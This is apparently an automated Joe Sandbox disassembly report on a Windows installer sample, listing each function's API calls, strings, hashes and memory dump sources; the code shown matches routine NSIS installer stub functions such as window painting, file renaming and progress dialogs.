                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                            • String ID: N
                                                                                                            • API String ID: 3103080414-1130791706
                                                                                                            • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                            • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                            • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                            • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                            • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                            • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                            • String ID: F
                                                                                                            • API String ID: 941294808-1304234792
                                                                                                            • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                            • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                            • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                            • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                            Function 00404850 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                            • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
                                                                                                            • lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                              • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                              • Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                            • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,?,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                              • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                              • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                              • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: (7B$A
                                                                                                            • API String ID: 2624150263-3645020878
                                                                                                            • Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                            • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                            • Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                            • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                            Function 00406034 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                            • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                              • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                              • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                            • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                            • wsprintfA.USER32 ref: 004060B3
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                            • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                              • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                              • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                                            • API String ID: 2171350718-461813615
                                                                                                            • Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                            • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                            • Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                            • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                            Function 00402F30 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 203memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F60
                                                                                                              • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                              • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0040A230), ref: 004030F0
                                                                                                            Strings
                                                                                                            • Inst, xrefs: 00403017
                                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                                                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                                                                            • Error launching installer, xrefs: 00402F80
                                                                                                            • Null, xrefs: 00403029
                                                                                                            • soft, xrefs: 00403020
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                            • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                            • API String ID: 2803837635-787788815
                                                                                                            • Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                            • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                            • Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                            • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD
                                                                                                            Function 0040640A Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 209stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 0040654B
                                                                                                            • GetWindowsDirectoryW.KERNEL32(004281E0,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                            • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                            • lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                            Strings
                                                                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
                                                                                                            • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                            • API String ID: 717251189-730719616
                                                                                                            • Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                            • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                            • Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                            • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D
                                                                                                            Function 004043C6 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                            • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                            • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                            • GetSysColor.USER32(?), ref: 0040444C
                                                                                                            • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                            • DeleteObject.GDI32(?), ref: 00404476
                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2320649405-0
                                                                                                            • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                            • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                            • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                            • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                            Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A
                                                                                                              • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405FD5
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                            • String ID: 9
                                                                                                            • API String ID: 163830602-2366072709
                                                                                                            • Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                            • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                            • Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                            • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59
                                                                                                            Function 00405450 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                            • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                            • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                            • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 2531174081-0
                                                                                                            • Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                            • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                            • Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                            • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                            Function 00402E8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(?,00000000), ref: 00402EA9
                                                                                                            • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                            • wsprintfW.USER32 ref: 00402EF5
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                              • Part of subcall function 00402E72: MulDiv.KERNEL32(?,00000064,?), ref: 00402E87
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                            • String ID: ... %d%%
                                                                                                            • API String ID: 722711167-2449383134
                                                                                                            • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                            • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                            • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                            • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                            Function 00404D1A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                            • GetMessagePos.USER32 ref: 00404D3D
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                            • String ID: f
                                                                                                            • API String ID: 41195575-1993550816
                                                                                                            • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                            • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                            • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                            • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                            Function 00406752 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                            • wsprintfW.USER32 ref: 004067A4
                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                                                            • API String ID: 2200240437-1946221925
                                                                                                            • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                            • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                            • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                            • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                                                                            Function 00402DF3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
                                                                                                            • wsprintfW.USER32 ref: 00402E45
